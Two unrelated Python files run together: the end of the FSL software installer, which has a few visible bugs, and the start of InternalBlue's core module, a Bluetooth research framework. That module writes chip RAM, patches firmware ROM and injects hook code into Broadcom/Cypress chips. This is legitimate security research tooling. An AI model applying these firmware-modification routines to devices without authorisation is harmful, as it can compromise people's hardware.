results[app] = 'Unable to remove broken link to %s' % (
app_target)
create_link = False
else:
MsgUser.debug("Link is correct, skipping.")
create_link = False
else:
MsgUser.debug(
"%s doesn't look like a symlink, "
"so let's not delete it." % (app_location))
results[app] = (
"%s is not a link so hasn't been updated to point at the "
"new FSL install.") % (app_location)
create_link = False
if create_link:
MsgUser.debug('Create a link for %s' % (app))
if os.path.exists(app_target):
try:
run_cmd_dropstdout(
"ln -s %s %s" % (app_target, app_location),
as_root=True)
except RunCommandError, e:
MsgUser.debug(
"Unable to create link to %s (%s)." % (
app_target, str(e)))
results[app] = (
'Unable to create link to %s.') % (app_target)
else:
MsgUser.debug(
'Unable to find application'
' %s to link to.') % (app_target)
if results:
raise MakeApplicationLinksError(results)
class CheckX11Warning(Exception):
pass
def check_X11(x11):
'''Function to find X11 install on Mac OS X and confirm it is compatible.
Advise user to download Xquartz if necessary'''
MsgUser.message(
"Checking for X11 windowing system (required for FSL GUIs).")
xbin = ''
for x in x11['apps']:
if os.path.exists(os.path.join(x11['location'], x)):
xbin = x
if xbin != '':
# Find out what version is installed
x_v_cmd = [
'/usr/bin/mdls', '-name',
'kMDItemVersion', os.path.join(x11['location'], xbin)]
try:
cmd = Popen(x_v_cmd, stdout=PIPE, stderr=STDOUT)
(vstring, _) = cmd.communicate()
except Exception, e:
raise CheckX11Warning(
"Unable to check X11 version (%s)" % (str(e)))
if cmd.returncode:
MsgUser.debug("Error finding the version of X11 (%s)" % (vstring))
# App found, but can't tell version, warn the user
raise CheckX11Warning(
"X11 (required for FSL GUIs) is installed but I"
" can't tell what the version is.")
else:
# Returns:
# kMDItemVersion = "2.3.6"\n
(_, _, version) = vstring.strip().split()
if version.startswith('"'):
version = version[1:-1]
if version in x11['bad_versions']:
raise CheckX11Warning(
"X11 (required for FSL GUIs) is a version that"
" is known to cause problems. We suggest you"
" upgrade to the latest XQuartz release from "
"%s" % (x11['download_url']))
else:
MsgUser.debug(
"X11 found and is not a bad version"
" (%s: %s)." % (xbin, version))
else:
# No X11 found, warn the user
raise CheckX11Warning(
"The FSL GUIs require the X11 window system which I can't"
" find in the usual places. You can download a copy from %s"
" - you will need to install this before the GUIs will"
" function" % (x11['download_url']))
def do_install(options, settings):
MsgUser.message(
shell_colours.bold + settings.title + shell_colours.default)
if options.test_installer:
settings.main_mirror = options.test_installer
this_computer = Host
if not this_computer.supported:
MsgUser.debug("Unsupported host %s %s %s" % (
this_computer.o_s,
this_computer.arch,
this_computer.os_type))
raise InstallError(
"Unsupported host - you could try building from source")
if this_computer.o_s == "linux":
system_environment = True
with_matlab = False
application_links = False
x11 = False
elif this_computer.o_s == "darwin":
system_environment = False
with_matlab = True
application_links = True
x11 = True
else:
MsgUser.debug("Unrecognised OS %s" % (this_computer.o_s))
raise InstallError("Unrecognised OS")
my_uid = os.getuid()
def configure_environment(fsldir, env_all=False, skip=False, matlab=False):
if skip:
return
if env_all:
if system_environment:
# Setup the system-wise environment
try:
setup_system_environment(fsldir)
except SetupEnvironmentError, e:
MsgUser.debug(str(e))
MsgUser.failed(
"Failed to configure system-wide profiles "
"with FSL settings: %s" % (str(e)))
except SetupEnvironmentSkip, e:
MsgUser.skipped(
"Some shells already configured: %s" % (str(e)))
else:
MsgUser.debug("System-wide profiles setup.")
MsgUser.ok("System-wide FSL configuration complete.")
else:
MsgUser.skipped(
"System-wide profiles not supported on this OS")
elif my_uid != 0:
# Setup the environment for the current user
try:
setup_environment(fsldir, with_matlab=matlab)
except SetupEnvironmentError, e:
MsgUser.debug(str(e))
MsgUser.failed(str(e))
else:
MsgUser.ok(
"User profile updated with FSL settings, you will need "
"to log out and back in to use the FSL tools.")
if my_uid != 0:
if options.quiet:
settings.inst_qus.defaults = True
print '''
We may need administrator rights, but you have specified fully automated
mode - you may still be asked for an admin password if required.'''
print '''
To install fully automatedly, either ensure this is running as the root
user (use sudo) or that you can write to the folder you wish to install
FSL in.'''
elif (not options.download and
not options.list_versions and
not options.get_source and
not options.get_feeds):
MsgUser.warning(
'''Some operations of the installer require administative rights,
for example installing into the default folder of /usr/local.
If your account is an 'Administrator' (you have 'sudo' rights)
then you will be prompted for your administrator password
when necessary.''')
if not options.d_dir and options.quiet:
raise InstallError(
"Quiet mode requires you to specify the install location"
" (e.g. /usr/local)")
if not options.quiet and not options.list_versions:
MsgUser.message(
"When asked a question, the default answer is given in square "
"brackets.\nHit the Enter key to accept this default answer.")
if options.env_only and my_uid != 0:
configure_environment(
get_fsldir(specified_dir=options.d_dir),
options.env_all)
return
if options.archive:
if not options.skipchecksum:
if not options.checksum:
raise InstallError(
"No checksum provided and checking not disabled")
else:
checksummer = globals()[options.checksum_type + 'File']
if options.checksum != checksummer(options.archive):
raise InstallError("FSL archive doesn't match checksum")
else:
MsgUser.ok("FSL Package looks good")
arc_version = archive_version(options.archive)
MsgUser.message(
"Installing FSL software version %s..." % (arc_version))
fsldir = install_archive(
archive=options.archive, fsldir=options.d_dir)
try:
post_install(fsldir=fsldir, settings=settings, quiet=options.quiet)
except PostInstallError, e:
raise InstallError(str(e))
configure_environment(
fsldir=fsldir, env_all=options.env_all,
skip=options.skip_env, matlab=with_matlab)
return
# All the following options require the Internet...
try:
settings.mirror = fastest_mirror(
settings.mirrors, settings.mirrors_file)
except SiteNotResponding, e:
# We can't find the FSL site - possibly the internet is down
raise InstallError(e)
try:
self_update(settings.mirror)
except SelfUpdateError, e:
MsgUser.debug("Self update error: %s" % (str(e)))
MsgUser.warning("Error checking for updates to installer - continuing")
if options.list_versions:
# Download a list of available downloads from the webserver
list_releases(settings.mirror)
return
if options.download:
MsgUser.debug("Attempting to download latest release")
try:
download_release(request_version=options.requestversion,
skip_verify=options.skipchecksum)
except DownloadFileError, e:
raise("Unable to download release %s" % (str(e)))
return
if options.update:
fsldir = get_fsldir()
status, new_v = check_for_updates(settings.mirror, fsldir=fsldir)
if status == UPDATE:
MsgUser.ok("Version %s available." % new_v)
if not settings.inst_qus.ask_question('update'):
return
elif status == UPGRADE:
MsgUser.ok("Version %s available." % new_v)
if not settings.inst_qus.ask_question('upgrade'):
return
else:
MsgUser.ok("FSL is up-to-date.")
return
if options.get_source:
MsgUser.debug("Attempting to download source")
try:
download_release(
request_version=options.requestversion,
skip_verify=options.skipchecksum,
source_code=True)
except DownloadFileError, e:
raise("Unable to download source code %s" % (str(e)))
return
if options.get_feeds:
MsgUser.debug("Attempting to download FEEDS")
try:
download_release(
request_version=options.requestversion,
skip_verify=options.skipchecksum,
feeds=True)
except DownloadFileError, e:
raise("Unable to download FEEDS %s" % (str(e)))
return
try:
(version, details) = get_web_version_and_details(
request_version=options.requestversion
)
if 'redirect' in details:
MsgUser.message("Please download FSL using the instructions here:")
MsgUser.message("%s" % (details['redirect']))
return
fsldir = get_fsldir(specified_dir=options.d_dir, install=True)
reinstall = True
if os.path.exists(fsldir):
inst_version = get_installed_version(fsldir)
if inst_version == version:
reinstall = Settings.inst_qus.ask_question('version_match')
if reinstall:
(fname, version, details) = download_release(
to_temp=True,
request_version=options.requestversion,
skip_verify=options.skipchecksum)
if not details['supported']:
MsgUser.debug(
"This OS is not officially supported -"
" you may experience issues"
)
MsgUser.debug(
"Installing %s from %s (details: %s)" % (
fname, version, details))
MsgUser.message(
"Installing FSL software version %s..." % (version))
install_archive(
archive=fname, fsldir=fsldir)
try:
safe_delete(fname)
except SafeDeleteError, e:
MsgUser.debug(
"Unable to delete downloaded package %s ; %s" % (
fname, str(e)))
if details['notes']:
MsgUser.message(details['notes'])
try:
post_install(
fsldir=fsldir, settings=settings,
quiet=options.quiet, x11=x11,
app_links=application_links)
except PostInstallError, e:
raise InstallError(str(e))
except DownloadError, e:
MsgUser.debug("Unable to download FSL %s" % (str(e)))
raise InstallError("Unable to download FSL")
except InstallArchiveError, e:
MsgUser.debug("Unable to unpack FSL ; %s" % (str(e)))
raise InstallError("Unable to unpack FSL - %s" % (str(e)))
configure_environment(
fsldir=fsldir, env_all=options.env_all,
skip=options.skip_env, matlab=with_matlab)
if details['notes']:
MsgUser.message(details['notes'])
def parse_options(args):
usage = "usage: %prog [options]"
ver = "%%prog %s" % (version)
parser = OptionParser(usage=usage, version=ver)
parser.add_option("-d", "--dest", dest="d_dir",
help="Install into folder given by DESTDIR - "
"e.g. /usr/local/fsl",
metavar="DESTDIR", action="store",
type="string")
parser.add_option("-e", dest="env_only",
help="Only setup/update your environment",
action="store_true")
parser.add_option("-E", dest="env_all",
help="Setup/update the environment for ALL users",
action="store_true")
parser.add_option("-v", help="Print version number and exit",
action="version")
parser.add_option("-c", "--checkupdate", dest='update',
help="Check for FSL updates -"
" needs an internet connection",
action="store_true")
parser.add_option("-o", "--downloadonly", dest="download",
help=SUPPRESS_HELP,
action="store_true")
advanced_group = OptionGroup(
parser, "Advanced Install Options",
"These are advanced install options")
advanced_group.add_option(
"-l", "--listversions", dest="list_versions",
help="List available versions of FSL",
action="store_true")
advanced_group.add_option(
"-V", "--fslversion", dest="requestversion",
help="Download the specific version FSLVERSION of FSL",
metavar="FSLVERSION", action="store",
type="string")
advanced_group.add_option(
"-s", "--source", dest="get_source",
help="Download source code for FSL",
action="store_true")
advanced_group.add_option(
"-F", "--feeds", dest="get_feeds",
help="Download FEEDS",
action="store_true")
advanced_group.add_option(
"-q", "--quiet", dest='quiet',
help="Silence all messages - useful if scripting install",
action="store_true")
advanced_group.add_option(
"-p", dest="skip_env",
help="Don't setup the environment",
action="store_true")
parser.add_option_group(advanced_group)
debug_group = OptionGroup(
parser, "Debugging Options",
"These are for use if you have a problem running this installer.")
debug_group.add_option(
"-f", "--file", dest="archive",
help="Install a pre-downloaded copy of the FSL archive",
metavar="ARCHIVEFILE", action="store",
type="string")
debug_group.add_option(
"-C", "--checksum", dest="checksum",
help="Supply the expected checksum for the pre-downloaded FSL archive",
metavar="CHECKSUM", action="store",
type="string")
debug_group.add_option(
"-T", "--checksum-type", dest="checksum_type",
default="sha256",
help="Specify the type of checksum",
action="store",
type="string")
debug_group.add_option(
"-M", "--nochecksum", dest="skipchecksum",
help="Don't check the pre-downloaded FSL archive",
action="store_true")
debug_group.add_option(
"-D", dest="verbose",
help="Switch on debug messages",
action="store_true")
debug_group.add_option(
"-G", dest="test_installer",
help=SUPPRESS_HELP,
action="store",
type="string")
debug_group.add_option(
"-w", dest="test_csv",
help=SUPPRESS_HELP,
action="store_true"
)
parser.add_option_group(debug_group)
return parser.parse_args(args)
if __name__ == '__main__':
(options, args) = parse_options(sys.argv[1:])
if options.verbose:
MsgUser.debugOn()
print options
if options.quiet:
MsgUser.quietOn()
if options.test_csv:
HAS_JSON = False
installer_settings = Settings()
try:
do_install(options, installer_settings)
except BadVersion, e:
MsgUser.debug(str(e))
MsgUser.failed("Unable to find requested version!")
sys.exit(1)
except (InstallError, GetFslDirError, GetInstalledVersionError), e:
MsgUser.failed(str(e))
sys.exit(1)
except UnsupportedOs, e:
MsgUser.failed(str(e))
sys.exit(1)
except KeyboardInterrupt, e:
MsgUser.message('')
MsgUser.failed("Install aborted.")
sys.exit(1)
|
core.py | #!/usr/bin/env python2
# core.py
#
# This file contains the main class of the framework which
# includes the thread functions for the receive and send thread.
# It also implements methods to setup the TCP connection to the
# Android Bluetooth stack via ADB port forwarding
#
# Copyright (c) 2020 The InternalBlue Team. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from __future__ import division
import socket
import struct
from future import standard_library
import pwnlib
from pwnlib.asm import asm
from pwnlib.exception import PwnlibException
from pwnlib.util.fiddling import bits, unbits
from .utils.pwnlib_wrapper import p16, p8, u32, u16, p32, log, context, flat
from .fw import FirmwareDefinition
standard_library.install_aliases()
from builtins import hex
from builtins import str
from builtins import range
from builtins import object
from past.utils import old_div
from abc import ABCMeta, abstractmethod
from .fw.fw import Firmware
import datetime
import time
import queue as queue2k
from . import hci
from .objects.queue_element import QueueElement
from .objects.connection_information import ConnectionInformation
from future.utils import with_metaclass
from internalblue.utils import bytes_to_hex
from internalblue.hci import HCI, HCI_COMND
try:
from typing import (
List,
Optional,
Any,
TYPE_CHECKING,
Tuple,
Union,
NewType,
Callable,
cast,
)
from internalblue import (
Address,
Record,
Task,
HCI_CMD,
FilterFunction,
ConnectionNumber,
ConnectionDict,
ConnectionIndex,
BluetoothAddress,
HeapInformation,
QueueInformation,
Opcode,
)
from . import DeviceTuple
if TYPE_CHECKING:
pass
except:
pass
# import logging
# log = logging.getLogger(__name__)
class InternalBlue(with_metaclass(ABCMeta, object)):
def __init__(
self,
queue_size: int = 1000,
btsnooplog_filename: str = "btsnoop.log",
log_level: str = "info",
fix_binutils: bool = True,
data_directory: str = ".",
replay: bool = False,
) -> None:
context.log_level = log_level
context.log_file = data_directory + "/_internalblue.log"
context.arch = "thumb"
self.interface = None # holds the context.device / hci interaface which is used to connect, is set in cli
self.fw: FirmwareDefinition = None # holds the firmware file
self.data_directory = data_directory
self.s_inject = (
None
) # type: socket.socket # This is the TCP socket to the HCI inject port
self.s_snoop = (
None
) # type: socket.socket # This is the TCP socket to the HCI snoop port
# If btsnooplog_filename is set, write all incomming HCI packets to a file (can be viewed in wireshark for debugging)
if btsnooplog_filename is not None:
self.write_btsnooplog = True
self.btsnooplog_file = open(
self.data_directory + "/" + btsnooplog_filename, "wb"
)
else:
self.write_btsnooplog = False
# The sendQueue connects the core framework to the sendThread. With the
# function sendH4 or sendHciCommand, the core framework (or a CLI command / user script)
# can put an H4 packet or HCI Command into this queue. The queue entry should be a tuple:
# (h4type, data, response_queue, response_hci_filter_function)
# - h4type: The H4 packet type (e.g. 1 for HCI Command or 7 for Broadcom Diagnostic)
# - data: The H4 payload (byte string)
# - response_queue: queue that is used for delivering the H4 response
# back to the entity that put the H4 command into the
# sendQueue. May be None if no response is expected/needed.
# If a response_queue is specified, it is also necessary to
# specify a response_hci_filter_function.
# - response_hci_filter_function: An hci callback function (see registerHciCallback())
# that is used to test whether incomming H4 packets are the
# response to the packet that was sent. May be None if response_queue
# is also None.
# The sendThread polls the queue, gets the above mentioned tuple, sends the
# H4 command to the firmware and then waits for the response from the
# firmware (the response is recognized with the help of the filter function).
# Once the response arrived, it puts the response into the response_queue from
# the tuple. See sendH4() and sendHciCommand().
self.sendQueue = queue2k.Queue(queue_size) # type: queue2k.Queue[Task]
self.recvThread: Optional[
pwnlib.context.Thread
] = None # The thread which is responsible for the HCI snoop socket
self.sendThread: Optional[
pwnlib.context.Thread
] = None # The thread which is responsible for the HCI inject socket
self.tracepoints = [] # A list of currently active tracepoints
# The list contains tuples:
# [0] target address
# [1] address of the hook code
self.tracepoint_registers: Optional[
List[int]
] = None # Last captured register values from a tracepoint
self.tracepoint_memdump_parts = {} # Last captured RAM dump from a tracepoint
self.tracepoint_memdump_address = None # Start address of the RAM dump
# The registeredHciCallbacks list holds callback functions which are being called by the
# recvThread once a HCI Event is being received. Use registerHciCallback() for registering
# a new callback (put it in the list) and unregisterHciCallback() for removing it again.
self.registeredHciCallbacks = []
# The registeredHciRecvQueues list holds queues which are being filled by the
# recvThread once a HCI Event is being received. Use registerHciRecvQueue() for registering
# a new queue (put it in the list) and unregisterHciRecvQueue() for removing it again.
# Actually the registeredHciRecvQueues holds tuples with the format: (queue, filter_function)
# filter_function will be called for each packet that is received and only if it returns
# True, the packet will be put into the queue. The filter_function can be None in order
# to put all packets into the queue.
self.registeredHciRecvQueues = (
[]
) # type: List[Tuple[queue2k.Queue[Record], FilterFunction]]
self.exit_requested = False # Will be set to true when the framework wants to shut down (e.g. on error or user exit)
self.running = False # 'running' is True once the connection to the HCI sockets is established
# and the recvThread and sendThread are started (see connect() and shutdown())
self.log_level = log_level
self.check_binutils(
fix_binutils
) # Check if ARM binutils are installed (needed for asm() and disasm())
# If fix_binutils is True, the function tries to fix the error were
# the binutils are installed but not found by pwntools (e.g. under Arch Linux)
self.stackDumpReceiver = None # This class will monitor the HCI Events and detect stack trace events.
# Register callbacks which handle specific HCI Events:
self.registerHciCallback(self.connectionStatusCallback)
self.registerHciCallback(self.coexStatusCallback)
self.registerHciCallback(self.readMemoryPoolStatisticsCallback)
# If the --replay flag was used and a chip is spoofed.
self.replay = replay
def check_binutils(self, fix=True):
"""
Test if ARM binutils is in path so that asm and disasm (provided by
pwntools) work correctly.
It may happen, that ARM binutils are installed but not found by pwntools.
If 'fix' is True, check_binutils will try to fix this.
"""
saved_loglevel = context.log_level
context.log_level = "critical"
try:
pwnlib.asm.which_binutils(
"as"
) # throws PwnlibException if as cannot be found
context.log_level = saved_loglevel
return True
except PwnlibException:
context.log_level = saved_loglevel
log.debug("pwnlib.asm.which_binutils() cannot find 'as'!")
if not fix:
return False
# Work around for arch (with installed arm-none-eabi-binutils)
import os
from glob import glob
def which_binutils_fixed(tool):
pattern = "arm-*-%s" % tool
for directory in os.environ["PATH"].split(":"):
res = sorted(glob(os.path.join(directory, pattern)))
if res:
return res[0]
raise PwnlibException("Could not find tool %s." % tool)
try:
which_binutils_fixed("as")
# yeay it worked! fix it in pwnlib:
pwnlib.asm.which_binutils = which_binutils_fixed
log.debug("installing workaround for pwnlib.asm.which_binutils() ...")
return True
except PwnlibException:
log.warn(
"pwntools cannot find binutils for arm architecture. Disassembling will not work!"
)
return False
def _parse_time(self, time):
# type: (Any) -> datetime.datetime
"""
Taken from: https://github.com/joekickass/python-btsnoop
Record time is a 64-bit signed integer representing the time of packet arrival,
in microseconds since midnight, January 1st, 0 AD nominal Gregorian.
In order to avoid leap-day ambiguity in calculations, note that an equivalent
epoch may be used of midnight, January 1st 2000 AD, which is represented in
this field as 0x00E03AB44A676000.
"""
time_betw_0_and_2000_ad = int("0x00E03AB44A676000", 16)
time_since_2000_epoch = datetime.timedelta(
microseconds=time
) - datetime.timedelta(microseconds=time_betw_0_and_2000_ad)
return datetime.datetime(2000, 1, 1) + time_since_2000_epoch
@abstractmethod
def _recvThreadFunc(self):
# type: () -> None
pass
def _sendThreadFunc(self):
# type: () -> None
"""
This is the run-function of the sendThread. It polls the sendQueue for new 'send tasks'
and executes them (sends H4 commands to the chip and returns the response).
The entries of the sendQueue are tuples representing a 'send task':
(h4type, payload, response_queue)
- h4type: The H4 type (8 bit integer) to send
- data: The H4 payload (byte string) to send
- response_queue: queue that is used for delivering the H4 response
back to the entity that put the H4 command into the
sendQueue.
Use sendHciCommand() to put 'send tasks' into the sendQueue!
The thread stops when exit_requested is set to True.
"""
log.debug("Send Thread started.")
while not self.exit_requested:
# Little bit ugly: need to re-apply changes to the global context to the thread-copy
context.log_level = self.log_level
# Wait for 'send task' in send queue
try:
task = self.sendQueue.get(timeout=0.5)
except queue2k.Empty:
continue
# Extract the components of the task
try:
h4type, data, queue, filter_function = task
except ValueError:
# might happen if H4 is not supported
log.debug("Failed to unpack queue item.")
continue
# Special handling of ADBCore and HCICore
# ADBCore: adb transport requires to prepend the H4 data with its length
# HCICore: need to manually save the data to btsnoop log as it is not
# reflected to us as with adb
if self.__class__.__name__ == "ADBCore":
# prepend with total length for H4 over adb with modified Bluetooth module
if not self.serial:
data = p16(len(data)) + data
# If we do not have a patched module, we write to the serial using the same socket.
# Echoing HCI commands to the serial interface has the following syntax:
#
# echo -ne "\x01\x4c\xfc\x05\x33\x22\x11\x00\xaa"
# 0x01: HCI command
# 0xfc4c: Write RAM
# 0x05: Parameter length
# 0x3322...: Parameters
#
# ...and that's how the data is formatted already anyway
elif self.__class__.__name__ == "HCICore":
if self.write_btsnooplog:
# btsnoop record header data:
btsnoop_data = p8(h4type) + data
btsnoop_orig_len = len(btsnoop_data)
btsnoop_inc_len = len(btsnoop_data)
btsnoop_flags = 0
btsnoop_drops = 0
btsnoop_time = datetime.datetime.now()
btsnoop_record_hdr = struct.pack(
">IIIIq",
btsnoop_orig_len,
btsnoop_inc_len,
btsnoop_flags,
btsnoop_drops,
self._btsnoop_pack_time(btsnoop_time),
)
with self.btsnooplog_file_lock:
self.btsnooplog_file.write(btsnoop_record_hdr)
self.btsnooplog_file.write(btsnoop_data)
self.btsnooplog_file.flush()
# Prepend UART TYPE and length.
out = p8(h4type) + data
# if the caller expects a response: register a queue to receive the response
if queue is not None and filter_function is not None:
recvQueue = queue2k.Queue(1)
self.registerHciRecvQueue(recvQueue, filter_function)
# Send command to the chip using s_inject socket
try:
log.debug("_sendThreadFunc: Send: " + bytes_to_hex(out))
self.s_inject.send(out)
except socket.error:
# TODO: For some reason this was required for proper save and replay, so this should be handled globally somehow. Or by implementing proper testing instead of the save/replay hack
pass
except socket.error as e:
log.warn(
"_sendThreadFunc: Sending to socket failed with {}, reestablishing connection.\nWith HCI sockets, some HCI commands require root!".format(
e
)
)
# socket are terminated by hcicore..
self._teardownSockets()
self._setupSockets()
# if the caller expects a response:
# Wait for the HCI event response by polling the recvQueue
if queue is not None and filter_function is not None:
try:
record = recvQueue.get(timeout=2)
hcipkt = record[0]
data = hcipkt.data
except queue2k.Empty:
log.warn("_sendThreadFunc: No response from the firmware.")
data = None
self.unregisterHciRecvQueue(recvQueue)
continue
queue.put(data)
self.unregisterHciRecvQueue(recvQueue)
log.debug("Send Thread terminated.")
def _tracepointHciCallbackFunction(self, record):
# type: (Record) -> None
hcipkt = record[0] # get HCI Event packet
timestamp = record[5] # get timestamp
# Check if event contains a tracepoint packet
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return
if hcipkt.event_code != 0xFF: # must be custom event (0xff)
return
if hcipkt.data[0:6] == "TRACE_": # My custom header (see hook code)
data = hcipkt.data[6:]
tracepoint_registers = [u32(data[i : i + 4]) for i in range(0, 68, 4)]
pc = tracepoint_registers[0]
registers = "pc: 0x%08x lr: 0x%08x sp: 0x%08x cpsr: 0x%08x\n" % (
pc,
tracepoint_registers[16],
tracepoint_registers[1],
tracepoint_registers[2],
)
registers += (
"r0: 0x%08x r1: 0x%08x r2: 0x%08x r3: 0x%08x r4: 0x%08x\n"
% tuple(tracepoint_registers[3:8])
)
registers += (
"r5: 0x%08x r6: 0x%08x r7: 0x%08x r8: 0x%08x r9: 0x%08x\n"
% tuple(tracepoint_registers[8:13])
)
registers += "r10: 0x%08x r11: 0x%08x r12: 0x%08x\n" % tuple(
tracepoint_registers[13:16]
)
log.info("Tracepoint 0x%x was hit and deactivated:\n" % pc + registers)
filename = (
self.data_directory
+ "/"
+ "internalblue_tracepoint_registers_%s.bin"
% datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
)
log.info("Captured Registers for Tracepoint to %s" % filename)
f = open(filename, "w")
f.write(registers)
f.close()
self.tracepoint_registers = tracepoint_registers
# remove tracepoint from self.tracepoints
for tp in self.tracepoints:
if tp[0] == pc:
self.tracepoints.remove(tp)
break
# reset all RAM dump related variables:
self.tracepoint_memdump_address = None
self.tracepoint_memdump_parts = {}
elif hcipkt.data[0:6] == "RAM___": # My custom header (see hook code)
dump_address = u32(hcipkt.data[6:10])
data = hcipkt.data[10:]
if self.tracepoint_memdump_address is None:
self.tracepoint_memdump_address = dump_address
normalized_address = dump_address - self.tracepoint_memdump_address
self.tracepoint_memdump_parts[normalized_address] = data
# Check if this was the last packet
if (
len(self.tracepoint_memdump_parts)
== self.fw.TRACEPOINT_RAM_DUMP_PKT_COUNT
):
dump = flat(self.tracepoint_memdump_parts)
# TODO: use this to start qemu
filename = (
self.data_directory
+ "/"
+ "internalblue_tracepoint_0x%x_%s.bin"
% (
self.tracepoint_memdump_address,
datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"),
)
)
log.info(
"Captured Ram Dump for Tracepoint 0x%x to %s"
% (self.tracepoint_memdump_address, filename)
)
f = open(filename, "wb")
f.write(dump)
f.close()
def addTracepoint(self, address):
# type: (Address) -> bool
# Check if constants are defined in fw.py
for const in [
"TRACEPOINT_BODY_ASM_LOCATION",
"TRACEPOINT_BODY_ASM_SNIPPET",
"TRACEPOINT_HOOK_ASM",
"TRACEPOINT_HOOKS_LOCATION",
"TRACEPOINT_HOOK_SIZE",
]:
if const not in dir(self.fw):
log.warn(
"addTracepoint: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
if not self.check_running():
return False
# FIXME: Currently only works for aligned addresses
if address % 4 != 0:
log.warn("Only tracepoints at aligned addresses are allowed!")
return False
# Check if tracepoint exists
existing_hook_addresses = []
for tp_address, tp_hook_address in self.tracepoints:
existing_hook_addresses.append(tp_hook_address)
if tp_address == address:
log.warn("Tracepoint at 0x%x does already exist!" % address)
return False
# we only have room for 0x90/28 = 5 tracepoints
if len(self.tracepoints) >= 5:
log.warn("Already using the maximum of 5 tracepoints")
return False
# Find a free address for the hook code
for i in range(5):
hook_address = (
self.fw.TRACEPOINT_HOOKS_LOCATION + self.fw.TRACEPOINT_HOOK_SIZE * i
)
if hook_address not in existing_hook_addresses:
break
# Check if this is the first tracepoint
if self._tracepointHciCallbackFunction not in self.registeredHciCallbacks:
log.info("Initial tracepoint: setting up tracepoint engine.")
# compile assembler snippet containing the hook body code:
hooks_code = asm(
self.fw.TRACEPOINT_BODY_ASM_SNIPPET,
vma=self.fw.TRACEPOINT_BODY_ASM_LOCATION,
arch="thumb",
)
if len(hooks_code) > 0x100:
log.error(
"Assertion failed: len(hooks_code)=%d is larger than 0x100!"
% len(hooks_code)
)
# save memory content at the addresses where we place the snippet and the stage-1 hooks
self.tracepoint_saved_data = self.readMem(
self.fw.TRACEPOINT_BODY_ASM_LOCATION, 0x100
)
# write code for hook to memory
self.writeMem(self.fw.TRACEPOINT_BODY_ASM_LOCATION, hooks_code)
# Register tracepoint hci callback function
self.registerHciCallback(self._tracepointHciCallbackFunction)
# Add tracepoint to list
self.tracepoints.append((address, hook_address))
### Injecting stage-1 hooks ###
# save the 4 bytes at which the hook branch (e.g. b <hook address>) will be placed
saved_instructions = self.readMem(address, 4)
# we need to know the patchram slot in advance..
# little trick/hack: we just insert a patch now with the original data to
# receive the slot value. later we insert the actual patch which will reuse
# the same slot.
# FIXME: To increase performance, try to not do it like that ^^
self.patchRom(address, saved_instructions)
table_addresses, _, _ = self.getPatchramState()
patchram_slot = table_addresses.index(address)
log.info("Using patchram slot %d for tracepoint." % patchram_slot)
self.disableRomPatch(
address
) # Eval board requires to delete patch before installing it again
# compile assembler snippet containing the stage-1 hook code:
stage1_hook_code = asm(
self.fw.TRACEPOINT_HOOK_ASM
% (address, patchram_slot, self.fw.TRACEPOINT_BODY_ASM_LOCATION, address),
vma=hook_address,
arch="thumb",
)
if len(stage1_hook_code) > self.fw.TRACEPOINT_HOOK_SIZE:
log.error(
"Assertion failed: len(stage1_hook_code)=%d is larger than TRACEPOINT_HOOK_SIZE!"
% len(stage1_hook_code)
)
return False
# write code for hook to memory
log.debug("addTracepoint: injecting hook function...")
self.writeMem(hook_address, stage1_hook_code)
# patch in the hook branch instruction
patch = asm("b 0x%x" % hook_address, vma=address, arch="thumb")
if not self.patchRom(address, patch):
log.warn("addTracepoint: couldn't insert tracepoint hook!")
return False
log.debug(
"addTracepoint: Placed Tracepoint at 0x%08x (hook at 0x%x)."
% (address, hook_address)
)
return True
def deleteTracepoint(self, address):
# type: (Address) -> bool
if not self.check_running():
return False
# find tracepoint in the list
for tp in self.tracepoints:
if tp[0] == address:
# disable patchram slot for the tracepoint
self.disableRomPatch(tp[0])
# remove tracepoint from self.tracepoints
self.tracepoints.remove(tp)
break
else:
log.warn("deleteTracepoint: No tracepoint at address: 0x%x" % address)
return False
return True
def check_running(self):
# type: () -> bool
"""
Check if the framework is running (i.e. the sockets are connected,
the recv and send threads are running and exit_requested is not True)
"""
if self.exit_requested:
self.shutdown()
if not self.running:
log.warn("Not running. call connect() first!")
return False
return True
@abstractmethod
def device_list(self):
# type: () -> List[DeviceTuple]
pass
def connect(self):
# type: () -> bool
if self.exit_requested:
self.shutdown()
if self.running:
log.warn("Already running. call shutdown() first!")
return False
if not self.interface:
log.warn("No adb device identifier is set")
return False
if not self.local_connect():
return False
log.info("Connected to %s", self.interface)
# start receive thread
self.recvThread = context.Thread(target=self._recvThreadFunc)
self.recvThread.setDaemon(True)
self.recvThread.start()
# start send thread
self.sendThread = context.Thread(target=self._sendThreadFunc)
self.sendThread.setDaemon(True)
self.sendThread.start()
# register stackDumpReceiver callback:
self.stackDumpReceiver = hci.StackDumpReceiver()
# register hci callback:
self.registerHciCallback(self.stackDumpReceiver.recvPacket)
if not self.initialize_fimware():
log.warn("connect: Failed to initialize firmware!")
return False
self.running = True
return True
@abstractmethod
def local_connect(self):
return True
def initialize_fimware(self):
# type: () -> bool
"""
Checks if we are running on a Broadcom chip and loads available firmware information based
on LMP subversion.
"""
# send Read_Local_Version_Information
version = self.sendHciCommand(
HCI_COMND.Read_Local_Version_Information, "".encode("utf-8")
)
if not version or len(version) < 11:
log.warn(
"""initialize_fimware: Failed to send a HCI command to the Bluetooth driver.
adb: Check if you installed a custom bluetooth.default.so properly on your
Android device. bluetooth.default.so must contain the string 'hci_inject'.
hci: You might have insufficient permissions to send this type of command."""
)
return False
# Broadcom uses 0x000f as vendor ID, Cypress 0x0131
vendor = (version[9] << 8) + version[8]
if vendor != 0xF and vendor != 0x131:
log.critical("Not running on a Broadcom or Cypress chip!")
return False
else:
subversion = (version[11] << 8) + version[10]
iOS = False
